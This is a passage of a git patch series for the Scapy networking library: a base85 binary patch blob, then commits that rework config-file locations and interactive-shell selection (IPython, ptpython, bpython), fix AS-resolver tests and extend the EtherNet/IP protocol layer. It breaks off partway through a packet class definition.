zRnQ+L@?!hWe67uxfNOByJLXR?BIYJ4sP15*t&*yu-f5=K=g%x<|GRw!nJP0PJYoHx z?W-yM-LsgT@~ptygbYeeH7lRs6gc1(uW#|g|vShAu=xFh9hhzmt$)B7QjWw8N2d=`lYg+D*yGto$9V0 z?huM@D*K8op|5Vhj#Be0a* zaD<_6HymOA{qGx&u)21`5eznf_7!#J*Din~xH$ji2s@<&07ozZ1MMrDulk>8y>@FY z=>vEV2jEbpLp0ZpC9q>Qew{_}_w&A0;2Cpx+xO&K#iL%a{oS`cQrEnXyMXr9@AjMa zRohMbsu^fsc{Bp;tA>W>UB1UNmv$q^vxj@DPv$J^Bs}LKVMBxSwvACg7o7V2_`kZ% zF7hpUZaDH`mVEw<@P6~hW8hs5rmo^yfpIeMtVW1*fWJq}^MilH>vV9hCEKWQucv!0 zaRED~3Ky_rE^z`J!HE;#2pA3?`6m9>oQgofi=W;z(HDDe$R6DNuDY%Fzj`yod=CZ! z-T@rJq#57{(&*Rp6FU1pe$Uu+vK=pYsj>kaVT={v2qvrmN7!cpI6}bc{$Bre$K`JX ze!$hKy>|fSQl}~48q0nB`j$f1ZQ`0h{5#{=6a!sXyfs1hGGl(SD0H9Wn*~!2oB9Hb zi=?QZf`N$H$CJ5-Jl=+gLn+Tot)z#_ItBZ-gqZ-2pm#(-uXGSmR?9-ws7uS|c7Vt}U;*`~(lEy!M4CP? zpyhti^Q7fK(BXXny%%}E*n%tTT1x=~-c+B|xjN@NfFm4;4m`JJi-qx8KA>pslNBP5 z685%a9^rZ=18@X?fFm52pp{1tD6@VS(!bz-EdsQ!>?GO2Vs>peWOnH6DE)c~vY(`L<+V`88JpOKLfr zWikG3@VFaQVm4kSvkZlPH&p0xFo_@JHY<4Ijz)bxP8*lp?UIS86M!R(031QTGcI1s zpF^tjLZeLM7~lx&@41ywoKtB&)kVV73@UH!+OrNH`v4r_C>Z?t2U$Z2N&>7A0&s*w zfFqy)jv(F&a0Cy4BWxqf-b?`;As^rfQUFJ=12{qhz!AXB4ajL%C%^L5Rj|&diH54+ zRvzOkfFo>IR#U&m5g)H5!UCPtz?B`$!>}X!zB1Dht5ulc2oS3|gd$^;Dy-RWgh3a} zjW7^aT$oHhsV`CfUmW3I`>N8(Yv{|;IaMPR+aZ`sLf8En6>BM%gFVgAysITuLyRNV zTha`}L49r3)Tmvv;`jQueZRL*-N1uiUk=m%v~4O^`^*k4owWRE{}tuzOZZ3yq(_aF z_@>G%VMl+DMVPYZo}*pCkjXax_l}ZdXIq-`xLZSiy6;8Tg#L#k$T_=|znn*ig0L8I zy9970mOd@zHAP+Z3t)o2*=AbQ&nV*v5Vgkrq@qSLCJS203q}RB&9MZt^Lij8bg!c4 znig=Lk#)%|_0o3H6^zs*{x?TR6j5T|0ZLmJ(+}Y?W^-niCnOJzc`*Wq@8{S}m|Cz( zYT-$AixRw_SfZ?WUHLLB1QFhS@CPtA97od;uEAzBy4 z023%;UjKpljxM;uFCjMAaL^3|Wk0~>YKx3}jz>EVd(aS{_SIZh=e#*)w4ustWXJeI ze>Tpayj(MAhm_ikUc?D2)$!6|TziIP_zIr!iEhb3i8Zr7Z1_o)B5qLaNJaz zLvPR7?50X%%k0RW=f3cq%65(H*GtF2TjDJz+PoGMZLoK&67!SRLb1%PKNJI3NwD|+ zNO$f06ey>uMansJu-n^u8C+Pe;mPIzi1ZG zO;alR4Nvv7hmK(pI&r&8E}HB>`0Q6~Oxq7m=e3?^gr-?nyD2zIXQS^iN4X}>W{{QH zLv;S{)fa5rb=0lXUSs4{`wUwaIZ`jipT0kCm(uevky<&#*i)YQ9R)wU{6W@vijsJG z7*c$>c2spX+W+8pfpqJZ<~I+Grl-G4swPsbFN~}KV4$P69VFE19rU(v6>#;0?}OP74(6i> zDT*@!c{<=Kgf#ZxK;`v@YeFP-c?<EL~Z-FGX z$;Q1iZZ9A_vRojOVz+*F$oNcPu&m3;hAmwlOs&x)R#s1%!@F%Qz;F(VJcI^gyBXu! z9dWoY{jpUma@(6V)evC2w5%1Oqm8^ z(I60>4#fC~+h^Q3rJ%caBM7-kM7`jocfnGH6zbk&5>y@|xRx?uRyeb|zM{5!@_O2E zs6cUOdP95J;Fv*{1F0woI2B*0`6)|x`xKqhUXx|?%h z)Jzt+o(Q#M1Thu@CYtEsrY^@F^)M|_Yuy_688Ic6RlcsCR%v($WxOs8=RkeZ^h^@# znW^HLJDs58Cp7{!jwJYLGD&l?SANo{ccM#k>@A%;g91rXcO9L%Qo$Sue{N3x)F}1- zzz3(Kr^0E8Fvt{c*i|2*Up8rJGc~4^aGo3}x80Vn;L4y&0Rspg~W2_tim=-Ge)Ydwrt=oYtAH-5GiOEztu{}rbT=$%`P zyxH6N#AI8??=B<`T>(5Psn>cq*y6bd+&LC33BhJLR(GLk;SkOfi;AKs$^~Z%bgso@ zOsH9oPdJ%_u-VmFJdLZvtVifbY9v=gD1ABy`)Sx(X)1?Lb~tWS6pitBls8xyHguM6 zq!H}$C*u2QTB=x-u5e*;I7#?G;rBlU&j#5$s6VUvA z(+I)y)6839MWjc#vNS1eeX-SZS&(xMJAIIGn*Fg?oF7fGolx;3ZbV0EyiO`qUppQH z;?8;lD&a#XJ}E1fC69SG7mikdW!e^m5RizYvurmK63Sq41Ro*?S$)Mp4v-`zxg<96 z=m=UD)w@LM;W?7%q(bqm9DO#c78vx@*|s_5I?a*|ZD}T!Y=1A$CcKouCv6DNEA#hlQsuG^ZM-70gAj`3ZoQ=K|ey z($*nX8R4F*sb#tIRT~6sc|O&Q3DxHdf|m=`G)L7~27(OYH4ik)aWe$?Okx(y$@N9LLIqwzPMSP$OTf2uCjH|9&ib&x9ZUP@YA!m8tZk;uJsCE*f<30 z9h(XjBC`1;8WdO6cD9}SP<8qrgA9fmWP3hX+k;=lek7nsb08E@`}Gm``$xCdhwcWA zf7}|y^TMO1LUV%c!SEzLUo&l$s0pmlNi>EwKk(v&O;*z!C`dXgpa2PD@PBtLNTsMCas0K5RV*6%he5c zj9z;LvMnhuKZK_v<9SD7w=;i4N2XhI>`J@cR>zED=T3gdNk*p_PA6@5<9RF3DNob4 zHK(q#PHyt9GT`q7+7`Eh1>Z2GsNAh@w_KdJD^4lYuYZSm4~t*&YVpcER1$k2}p?$vrg5c}eI` z%!fS<7oSiW=6uxt4nA!quT!ohNVw0l6o^<}J0O%I$s%n$Co`->(<6Z?^QmNe-h1;e zJ9^*^PpzUtD~G;xvyL&k{xBp8(cQ6x?)Kc}^lk%T4u|^vzH$ag4%GB?!VGzU9kW(r zfcO6?-IyVcyNHPWR7Sy$s)bLt~mW}qjAH9wING<_< z+0mZLZ5b|X8x0yh93Hv$<@rrNjuaZd<2Qh3G=BF14{kef$>WZ+cWlY-`1!>08dH^kZXsW940}Dv#K*|;z{A(mkaah}jH}=z zZA$OLRBo&A7yZ!6k3SbH&P>tGY)(utb=#rmqQ;s+CA??b7AAwx{@Dbx z-A2IK&$(7sCA7OHInJ*i;G|}C(>Bg$ zDl>!$EM#ab6lHOjWGy5i7vQydj3W!$s|#V+Up^*7oCs!+Q4H#dppT0XuZ6UsmM?1) z^1*q1o8!8SuO^9vOA{57yvB*tF*eZPLE})Lcpf8v)(7!8N?*~naq8vCPtc|IeO>iD z`N8kZjfy|zwi}BzC#;IQNY6WGE(BWcE)HNX_0kOHmfEfpTQU@={eyh zDM)2i52h@hwVpnpKj)k8p8F<{)jE;3bX%o&?`OIBt7LrJa{uNH6UY*7Td@W{>4eb{DVaWevy5PmZgSj}x#*SN(QYk1MldWlit+f7wn74@)b3 zyznjH=lAxYRr^$rt9B11f{t`fr}bRiZ0HaAjvu!~O0&=Ojw904`Pb^nUfS_4((-SyiQtH_o9vN@~*8fA#pfXt>shj{Lr3?c0ZH)AXp!zBRQ?dw|Bw->TBQm#1F6Bs|8)`G-?+tJ=tnhECfC5UHyt2 z>i88*_R7?|Fr6CH;^?p)A@@;O1ch=!4PFw12>Vw-M<=@|frsT_(nHvag19p~^Z1c- zzRxog4oT_Xsw{_c&KzsmzcrD+@0X7#F|tO}k1-1VEF0Ync^VB>sR*mue6xQXU-?Tt zfJ}3LEH^THV|;5s!5SxEtF?Ix{mxSjymkEaghplk+1~Vi zyvNVyT&H?hKP4`IeA(rckNt|mg=D|zIa)wwC9*)wBFejRx z00J5oUy!SL50ve_Ud{ifef4+8EHP;R?;Z2!;gd|=1M|M92hy<2S$oUDBtDbAOuZxP z_=JL|nBf_$F398uYbVGL5|FG7YYP5QHqE|%9HJ<4xAt@$kCzAqfL^Vtuq*l&aAV%a7Ash12DMy#yKGzEt{@k!s50cD%sC; ziZ=|!?Mg4S-lfLfLoO81RA;x?SI7B^B@uCxOT0Yk!-zXJ$QPcGTq?LpEXaQ|ZgpyH zC`e-}IaYBWan0?JaOt)sr2APnA~*J{o7%>=uB;h@e^^0R+;%vWj(fS)!MD-&78QFU z={~`nVC6og8c^Z>8E9V#=-CAsQO%q5Tg7Qk{<=fG=+(bQx#aaQlyD`Cv%`CJ>>egc zq)Dyg-A2wn>-i>OUdQ?Nqwc2{uOF{;yjKR(n8TmlnqPXq&vUmof;rS%2KSHEJ(hb% zt<{C3a(n$bWLrNwa{}bp?!EiDj zCJnT&prS8XfE`o*r8#+0(@PHF3E1;F+4~=W_LcTTgbvWYYG{(>_nbhO++n43C6nX! ZVTov7Hrg{blN0(l5#{V|0c Union[str, None] - cf_path = os.path.join(os.path.expanduser("~"), cf) - try: - os.stat(cf_path) - except OSError: +def _probe_config_file(*cf, default=None): + # type: (str, Optional[str]) -> Union[str, None] + path = pathlib.Path(os.path.expanduser("~")) + if not path.exists(): + # ~ folder doesn't exist. Unsalvageable return None - else: - return cf_path + cf_path = path.joinpath(*cf) + if not cf_path.exists(): + if default is not None: + # We have a default ! set it + cf_path.parent.mkdir(parents=True, exist_ok=True) + with cf_path.open("w") as fd: + fd.write(default) + return str(cf_path.resolve()) + return None + return str(cf_path.resolve()) def _read_config_file(cf, _globals=globals(), _locals=locals(), @@ -119,8 +131,29 @@ def _validate_local(k): return k[0] != "_" and k not in ["range", "map"] -DEFAULT_PRESTART_FILE = _probe_config_file(".scapy_prestart.py") -DEFAULT_STARTUP_FILE = _probe_config_file(".scapy_startup.py") +# Default scapy prestart.py config file + +DEFAULT_PRESTART = """ +# Scapy CLI 'pre-start' config file +# see https://scapy.readthedocs.io/en/latest/api/scapy.config.html#scapy.config.Conf +# for all available options + +# default interpreter +conf.interactive_shell = "auto" + +# color theme (DefaultTheme, BrightTheme, ColorOnBlackTheme, BlackAndWhite, ...) +conf.color_theme = DefaultTheme() + +# disable INFO: tags related to dependencies missing +# log_loading.setLevel(logging.WARNING) + +# force-use libpcap +# conf.use_pcap = True +""".strip() + +DEFAULT_PRESTART_FILE = _probe_config_file(".config", "scapy", "prestart.py", + default=DEFAULT_PRESTART) +DEFAULT_STARTUP_FILE = _probe_config_file(".config", "scapy", "startup.py") def _usage(): @@ -299,6 +332,16 @@ def update_ipython_session(session): pass +def _scapy_prestart_builtins(): + # type: () -> Dict[str, Any] + """Load Scapy prestart and return all builtins""" + return { + k: v + for k, v in importlib.import_module(".config", "scapy").__dict__.copy().items() + if _validate_local(k) + } + + def _scapy_builtins(): # type: () -> Dict[str, Any] """Load Scapy and return all builtins""" @@ -412,11 +455,29 @@ def update_session(fname=None): update_ipython_session(scapy_session) +@overload +def init_session(session_name, # type: Optional[Union[str, None]] + mydict, # type: Optional[Union[Dict[str, Any], None]] + ret, # type: Literal[True] + ): + # type: (...) -> Dict[str, Any] + pass + + +@overload +def init_session(session_name, # type: Optional[Union[str, None]] + mydict=None, # type: Optional[Union[Dict[str, Any], None]] + ret=False, # type: Literal[False] + ): + # type: (...) -> None + pass + + def init_session(session_name, # type: Optional[Union[str, None]] mydict=None, # type: Optional[Union[Dict[str, Any], None]] ret=False, # type: bool ): - # type: (...) -> Optional[Dict[str, Any]] + # type: (...) -> Union[Dict[str, Any], None] from scapy.config import conf SESSION = {} # type: Optional[Dict[str, Any]] @@ -476,7 +537,7 @@ def init_session(session_name, # type: Optional[Union[str, None]] def _prepare_quote(quote, author, max_len=78): # type: (str, str, int) -> List[str] """This function processes a quote and returns a string that is ready -to be used in the fancy prompt. +to be used in the fancy banner. """ _quote = quote.split(' ') @@ -529,7 +590,7 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): if opt == "-h": _usage() elif opt == "-H": - conf.fancy_prompt = False + conf.fancy_banner = False conf.verb = 1 conf.logLevel = logging.WARNING elif opt == "-s": @@ -557,36 +618,23 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): # Reset sys.argv, otherwise IPython thinks it is for him sys.argv = sys.argv[:1] + if PRESTART_FILE: + _read_config_file( + PRESTART_FILE, + interactive=True, + _locals=_scapy_prestart_builtins() + ) + SESSION = init_session(session_name, mydict=mydict, ret=True) if STARTUP_FILE: - _read_config_file(STARTUP_FILE, interactive=True) - if PRESTART_FILE: - _read_config_file(PRESTART_FILE, interactive=True) - - if not conf.interactive_shell or conf.interactive_shell.lower() in [ - "ipython", "auto" - ]: - try: - import IPython - from IPython import start_ipython - except ImportError: - log_loading.warning( - "IPython not available. Using standard Python shell " - "instead.\nAutoCompletion, History are disabled." - ) - if WINDOWS: - log_loading.warning( - "On Windows, colors are also disabled" - ) - conf.color_theme = BlackAndWhite() - IPYTHON = False - else: - IPYTHON = True - else: - IPYTHON = False + _read_config_file( + STARTUP_FILE, + interactive=True, + _locals=SESSION + ) - if conf.fancy_prompt: + if conf.fancy_banner: from scapy.utils import get_terminal_width mini_banner = (get_terminal_width() or 84) <= 75 @@ -659,8 +707,100 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): banner_text += "\n" banner_text += mybanner - if IPYTHON: - banner = banner_text + " using IPython %s\n" % IPython.__version__ + # Configure interactive terminal + + if conf.interactive_shell not in [ + "ipython", + "python", + "ptpython", + "ptipython", + "bpython", + "auto"]: + log_loading.warning("Unknown conf.interactive_shell ! Using 'auto'") + conf.interactive_shell = "auto" + + # Auto detect available shells. + # Order: + # 1. IPython + # 2. bpython + # 3. ptpython + + _IMPORTS = { + "ipython": ["IPython"], + "bpython": ["bpython"], + "ptpython": ["ptpython"], + "ptipython": ["IPython", "ptpython"], + } + + if conf.interactive_shell == "auto": + # Auto detect + for imp in ["IPython", "bpython", "ptpython"]: + try: + importlib.import_module(imp) + conf.interactive_shell = imp.lower() + break + except ImportError: + continue + else: + log_loading.warning( + "No alternative Python interpreters found ! " + "Using standard Python shell instead." + ) + conf.interactive_shell = "python" + + if conf.interactive_shell in _IMPORTS: + # Check import + for imp in _IMPORTS[conf.interactive_shell]: + try: + importlib.import_module(imp) + except ImportError: + log_loading.warning("%s requested but not found !" % imp) + conf.interactive_shell = "python" + + # Display warning when using the default REPL + if conf.interactive_shell == "python": + log_loading.info( + "When using the default Python shell, AutoCompletion, History are disabled." + ) + if WINDOWS: + log_loading.info( + "On Windows, colors are also disabled" + ) + conf.color_theme = BlackAndWhite() + + # ptpython configure function + def ptpython_configure(repl): + # type: (Any) -> None + # Hide status bar + repl.show_status_bar = False + # Complete while typing (versus only when pressing tab) + repl.complete_while_typing = False + # Enable auto-suggestions + repl.enable_auto_suggest = True + # Disable exit confirmation + repl.confirm_exit = False + # Show signature + repl.show_signature = True + # Apply Scapy color theme: TODO + # repl.install_ui_colorscheme("scapy", + # Style.from_dict(_custom_ui_colorscheme)) + # repl.use_ui_colorscheme("scapy") + + # Start IPython or ptipython + if conf.interactive_shell in ["ipython", "ptipython"]: + import IPython + if conf.interactive_shell == "ptipython": + from ptpython.ipython import embed + banner = banner_text + " using IPython %s" % IPython.__version__ + try: + from importlib.metadata import version + ptpython_version = " " + version('ptpython') + except ImportError: + ptpython_version = "" + banner += " and ptpython%s\n" % ptpython_version + else: + banner = banner_text + " using IPython %s\n" % IPython.__version__ + from IPython import start_ipython as embed try: from traitlets.config.loader import Config except ImportError: @@ -669,7 +809,7 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): "available." ) try: - start_ipython( + embed( display_banner=False, user_ns=SESSION, exec_lines=["print(\"\"\"" + banner + "\"\"\")"] @@ -694,18 +834,57 @@ def interact(mydict=None, argv=None, mybanner=None, loglevel=logging.INFO): conf.version) # As of IPython 6-7, the jedi completion module is a dumpster # of fire that should be scrapped never to be seen again. - cfg.Completer.use_jedi = False + # This is why the following defaults to False. Feel free to hurt + # yourself (#GH4056) :P + cfg.Completer.use_jedi = conf.ipython_use_jedi else: cfg.TerminalInteractiveShell.term_title = False cfg.HistoryAccessor.hist_file = conf.histfile cfg.InteractiveShell.banner1 = banner # configuration can thus be specified here. + _kwargs = {} + if conf.interactive_shell == "ptipython": + _kwargs["configure"] = ptpython_configure try: - start_ipython(config=cfg, user_ns=SESSION) + embed(config=cfg, user_ns=SESSION, **_kwargs) except (AttributeError, TypeError): code.interact(banner=banner_text, local=SESSION) - else: + # Start ptpython + elif conf.interactive_shell == "ptpython": + # ptpython has special, non-default handling of __repr__ which breaks Scapy. + # For instance: >>> IP() + log_loading.warning("ptpython support is currently partially broken") + try: + from importlib.metadata import version + ptpython_version = " " + version('ptpython') + except ImportError: + ptpython_version = "" + banner = banner_text + " using ptpython%s" % ptpython_version + from ptpython.repl import embed + # ptpython has no banner option + print(banner) + embed( + locals=SESSION, + history_filename=conf.histfile, + title="Scapy %s" % conf.version, + configure=ptpython_configure + ) + # Start bpython + elif conf.interactive_shell == "bpython": + import bpython + from bpython.curtsies import main as embed + banner = banner_text + " using bpython %s" % bpython.__version__ + embed( + args=["-q", "-i"], + locals_=SESSION, + banner=banner, + welcome_message="" + ) + # Start Python + elif conf.interactive_shell == "python": code.interact(banner=banner_text, local=SESSION) + else: + raise ValueError("Invalid conf.interactive_shell") if conf.session: save_session(conf.session, SESSION) diff --git a/test/regression.uts b/test/regression.uts index eb51d61863a..0ba879690aa 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -540,8 +540,19 @@ scapy_delete_temp_files() assert len(conf.temp_files) == 0 = Emulate interact() +~ interact + import mock, sys from scapy.main import interact + +from scapy.main import DEFAULT_PRESTART_FILE +# By now .config/scapy/startup.py should have been created +with open(DEFAULT_PRESTART_FILE, "r") as fd: + OLD_DEFAULT_PRESTART = fd.read() + +with open(DEFAULT_PRESTART_FILE, "w+") as fd: + fd.write("conf.interactive_shell = 'ipython'") + # Detect IPython try: import IPython @@ -568,6 +579,50 @@ except: interact_emulator(extra_args=["-d"]) # Extended += Emulate interact() and test startup.py with ptpython +~ interact + +import sys +import mock + +from scapy.main import DEFAULT_PRESTART_FILE +# By now .config/scapy/startup.py should have been created +with open(DEFAULT_PRESTART_FILE, "w+") as fd: + fd.write("conf.interactive_shell = 'ptpython'") + +called = [] +def checker(*args, **kwargs): + locals = kwargs.pop("locals") + assert locals["IP"] + history_filename = kwargs.pop("history_filename") + assert history_filename == conf.histfile + called.append(True) + +ptpython_mocked_module = Bunch( + repl=Bunch( + embed=checker + ) +) + +modules_patched = { + "ptpython": ptpython_mocked_module, + "ptpython.repl": ptpython_mocked_module.repl, + "ptpython.repl.embed": ptpython_mocked_module.repl.embed, +} + +with mock.patch.dict("sys.modules", modules_patched): + try: + interact() + finally: + sys.ps1 = ">>> " + +# Restore +with open(DEFAULT_PRESTART_FILE, "w") as fd: + print(OLD_DEFAULT_PRESTART) + r = fd.write(OLD_DEFAULT_PRESTART) + +assert called + = Test explore() with GUI mode ~ command From 8e116af0e0326f71d54cc20d4b6d894ba3c9bddb Mon Sep 17 00:00:00 2001 From: Pierre Date: Thu, 3 Aug 2023 09:39:47 +0200 Subject: [PATCH 1071/1632] Tests: fix AS resolver tests (#4084) --- test/regression.uts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/test/regression.uts b/test/regression.uts index 0ba879690aa..7f43b7fc22b 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1639,7 +1639,7 @@ retry_test(_test) def _test(): ret = conf.AS_resolver.resolve("8.8.8.8", "8.8.4.4") assert (len(ret) == 2) - all(x[1] == "AS15169" for x in ret) + assert any(x[1] == "AS15169" for x in ret) retry_test(_test) @@ -1676,7 +1676,7 @@ def _test(): as_resolver6 = AS_resolver6() ret = as_resolver6.resolve("2001:4860:4860::8888", "2001:4860:4860::4444") assert (len(ret) == 2) - assert all(x[1] == 15169 for x in ret) + assert any(x[1] == 15169 for x in ret) retry_test(_test) From 3bd29da2a86aac1e82ab9197d156ff28cdd48860 Mon Sep 17 00:00:00 2001 From: Lex <55185179+claire-lex@users.noreply.github.com> Date: Thu, 3 Aug 2023 21:40:07 +0200 Subject: [PATCH 1072/1632] Update Ethernet/IP contrib and tests (#4083) Add Hart and CompoNet to Codespell ignore settings --- .config/codespell_ignore.txt | 2 + scapy/contrib/enipTCP.py | 289 +++++++++++++++++++++++------------ test/contrib/enipTCP.uts | 130 ++++++++-------- 3 files changed, 254 insertions(+), 167 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index f571d4a6568..b2c1a5b5a27 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -5,6 +5,7 @@ ba byteorder cace cas +componet cros delt doas @@ -14,6 +15,7 @@ ether eventtypes fo gost +hart iff inout microsof diff --git a/scapy/contrib/enipTCP.py b/scapy/contrib/enipTCP.py index c17686537a2..e35d2e27f67 100644 --- a/scapy/contrib/enipTCP.py +++ b/scapy/contrib/enipTCP.py @@ -2,6 +2,7 @@ # This file is part of Scapy # See https://scapy.net/ for more information # Copyright (C) 2019 Jose Diogo Monteiro +# Updated (C) 2023 Claire Vacherot # scapy.contrib.description = EtherNet/IP # scapy.contrib.status = loads @@ -18,10 +19,11 @@ from scapy.layers.inet import TCP from scapy.fields import LEShortField, LEShortEnumField, LEIntEnumField, \ LEIntField, LELongField, FieldLenField, PacketListField, ByteField, \ - PacketField, MultipleTypeField, StrLenField, StrFixedLenField, \ - XLEIntField, XLEStrLenField + StrLenField, StrFixedLenField, XLEIntField, XLEStrLenField, \ + LEFieldLenField, ShortField, IPField, LongField, XLEShortField _commandIdList = { + 0x0001: "UnknownCommand", 0x0004: "ListServices", # Request Struct Don't Have Command Spec Data 0x0063: "ListIdentity", # Request Struct Don't Have Command Spec Data 0x0064: "ListInterfaces", # Request Struct Don't Have Command Spec Data @@ -43,13 +45,72 @@ 105: "unsupported_prot_rev" } -_itemID = { +_typeIdList = { 0x0000: "Null Address Item", - 0x00a1: "Connection-based Address Item", - 0x00b1: "Connected Transport packet Data Item", - 0x00b2: "Unconnected message Data Item", - 0x8000: "Sockaddr Info, originator-to-target Data Item", - 0x8001: "Sockaddr Info, target-to-originator Data Item" + 0x000c: "CIP Identity", + 0x0086: "CIP Security Information", + 0x0087: "EtherNet/IP Capability", + 0x0088: "EtherNet/IP Usage", + 0x00a1: "Connected Address Item", + 0x00B1: "Connected Data Item", + 0x00B2: "Unconnected Data Item", + 0x0100: "List Services Response", + 0x8000: "Socket Address Info O->T", + 0x8001: "Socket Address Info T->O", + 0x8002: "Sequenced Address Item", + 0x8003: "Unconnected Message over UDP" +} + +_deviceTypeList = { + 0x0000: "Generic Device (deprecated)", + 0x0002: "AC Drive", + 0x0003: "Motor Overload", + 0x0004: "Limit Switch", + 0x0005: "Inductive Proximity Switch", + 0x0006: "Photoelectric Sensor", + 0x0007: "General Purpose Discrete I/O", + 0x0009: "Resolver", + 0x000C: "Communications Adapter", + 0x000E: "Programmable Logic Controller", + 0x0010: "Position Controller", + 0x0013: "DC Drive", + 0x0015: "Contactor", + 0x0016: "Motor Starter", + 0x0017: "Soft Start", + 0x0018: "Human-Machine Interface", + 0x001A: "Mass Flow Controller", + 0x001B: "Pneumatic Valve", + 0x001C: "Vacuum Pressure Gauge", + 0x001D: "Process Control Value", + 0x001E: "Residual Gas Analyzer", + 0x001F: "DC Power Generator", + 0x0020: "RF Power Generator", + 0x0021: "Turbomolecular Vacuum Pump", + 0x0022: "Encoder", + 0x0023: "Safety Discrete I/O Device", + 0x0024: "Fluid Flow Controller", + 0x0025: "CIP Motion Drive", + 0x0026: "CompoNet Repeater", + 0x0027: "Mass Flow Controller, Enhanced", + 0x0028: "CIP Modbus Device", + 0x0029: "CIP Modbus Translator", + 0x002A: "Safety Analog I/O Device", + 0x002B: "Generic Device (keyable)", + 0x002C: "Managed Ethernet Switch", + 0x002D: "CIP Motion Safety Drive Device", + 0x002E: "Safety Drive Device", + 0x002F: "CIP Motion Encoder", + 0x0030: "CIP Motion Converter", + 0x0031: "CIP Motion I/O", + 0x0032: "ControlNet Physical Layer Component", + 0x0033: "Circuit Breaker", + 0x0034: "HART Device", + 0x0035: "CIP-HART Translator", + 0x00C8: "Embedded Component", +} + +_interfaceList = { + 0x00: "CIP" } @@ -57,7 +118,7 @@ class ItemData(Packet): """Common Packet Format""" name = "Item Data" fields_desc = [ - LEShortEnumField("typeId", 0, _itemID), + LEShortEnumField("typeId", 0, _typeIdList), LEShortField("length", 0), XLEStrLenField("data", "", length_from=lambda pkt: pkt.length), ] @@ -66,97 +127,105 @@ def extract_padding(self, s): return '', s -class EncapsulatedPacket(Packet): - """Encapsulated Packet""" - name = "Encapsulated Packet" - fields_desc = [LEShortField("itemCount", 2), PacketListField( - "item", None, ItemData, count_from=lambda pkt: pkt.itemCount), ] - - -class BaseSendPacket(Packet): - """ Abstract Class""" - fields_desc = [ - LEIntField("interfaceHandle", 0), - LEShortField("timeout", 0), - PacketField("encapsulatedPacket", None, EncapsulatedPacket), - ] +# Unknown command (0x0001) -class CommandSpecificData(Packet): - """Command Specific Data Field Default""" +class ENIPUnknownCommand(Packet): + """Unknown Command reply""" + name = "ENIPUnknownCommand" pass -class ENIPSendUnitData(BaseSendPacket): - """Send Unit Data Command Field""" - name = "ENIPSendUnitData" - - -class ENIPSendRRData(BaseSendPacket): - """Send RR Data Command Field""" - name = "ENIPSendRRData" +# List services (0x0004) -class ENIPListInterfacesReplyItems(Packet): - """List Interfaces Items Field""" - name = "ENIPListInterfacesReplyItems" +class ENIPListServicesItem(Packet): + """List Services Item Field""" + name = "ENIPListServicesItem" fields_desc = [ - LEIntField("itemTypeCode", 0), - FieldLenField("itemLength", 0, length_of="itemData"), - StrLenField("itemData", "", length_from=lambda pkt: pkt.itemLength), + LEShortEnumField("itemTypeCode", 0, _typeIdList), + LEFieldLenField("itemLength", 0), + LEShortField("protocolVersion", 0), + XLEShortField("flag", 0), # TODO: detail with BitFields + StrFixedLenField("serviceName", None, 16), ] -class ENIPListInterfacesReply(Packet): - """List Interfaces Command Field""" - name = "ENIPListInterfacesReply" +class ENIPListServices(Packet): + """List Services Command Field""" + name = "ENIPListServices" fields_desc = [ - FieldLenField("itemCount", 0, count_of="identityItems"), - PacketField("identityItems", 0, ENIPListInterfacesReplyItems), + FieldLenField("itemCount", 0, count_of="items"), + PacketListField("items", None, ENIPListServicesItem), ] -class ENIPListIdentityReplyItems(Packet): - """List Identity Items Field""" - name = "ENIPListIdentityReplyItems" +# List identity (0x0063) + + +class ENIPListIdentityItem(Packet): + """List Identity Item Fields""" + name = "ENIPListIdentityReplyItem" fields_desc = [ - LEIntField("itemTypeCode", 0), - FieldLenField("itemLength", 0, length_of="itemData"), - StrLenField("itemData", "", length_from=lambda pkt: pkt.item_length), + LEShortEnumField("itemTypeCode", 0, _typeIdList), + LEFieldLenField("itemLength", 0), + LEShortField("protocolVersion", 0), + # Socket address + ShortField("sinFamily", 0), + ShortField("sinPort", 0), + IPField("sinAddress", None), + LongField("sinZero", 0), + # End socket address + LEShortField("vendorId", 0), # Vendor list could be added (long list) + LEShortEnumField("deviceType", 0, _deviceTypeList), + LEShortField("productCode", 0), + ByteField("revisionMajor", 0), + ByteField("revisionMinor", 0), + LEShortField("status", 0), + XLEIntField("serialNumber", 0), + ByteField("productNameLength", 0), + StrLenField("productName", None, + length_from=lambda pkt: pkt.productNameLength), + ByteField("state", 0) ] -class ENIPListIdentityReply(Packet): - """List Identity Command Field""" - name = "ENIPListIdentityReply" +class ENIPListIdentity(Packet): + """List identity request and response""" + name = "ENIPListIdentity" fields_desc = [ - FieldLenField("itemCount", 0, count_of="identityItems"), - PacketField("identityItems", None, ENIPListIdentityReplyItems), + FieldLenField("itemCount", 0, count_of="items"), + PacketListField("items", None, ENIPListIdentityItem) ] -class ENIPListServicesReplyItems(Packet): - """List Services Items Field""" - name = "ENIPListServicesReplyItems" +# List Interfaces (0x0064) + + +class ENIPListInterfacesItem(Packet): + """List Interfaces Item Fields""" + name = "ENIPListInterfacesItem" fields_desc = [ - LEIntField("itemTypeCode", 0), - LEIntField("itemLength", 0), - ByteField("version", 1), - ByteField("flag", 0), - StrFixedLenField("serviceName", None, 16 * 4), + LEShortEnumField("itemTypeCode", 0, _typeIdList), + FieldLenField("itemLength", 0, length_of="itemData"), + # TODO: Could be detailed + StrLenField("itemData", "", length_from=lambda pkt: pkt.itemLength), ] -class ENIPListServicesReply(Packet): - """List Services Command Field""" - name = "ENIPListServicesReply" +class ENIPListInterfaces(Packet): + """List Interfaces Command Field""" + name = "ENIPListInterfaces" fields_desc = [ - FieldLenField("itemCount", 0, count_of="identityItems"), - PacketField("targetItems", None, ENIPListServicesReplyItems), + FieldLenField("itemCount", 0, count_of="items"), + PacketListField("items", None, ENIPListInterfacesItem), ] -class ENIPRegisterSession(CommandSpecificData): +# Register Session (0x0065) + + +class ENIPRegisterSession(Packet): """Register Session Command Field""" name = "ENIPRegisterSession" fields_desc = [ @@ -165,6 +234,47 @@ class ENIPRegisterSession(CommandSpecificData): ] +# Unregister Session (0x0066) -- Requires further testing + + +class ENIPUnregisterSession(Packet): + """Unregister Session Command Field""" + name = 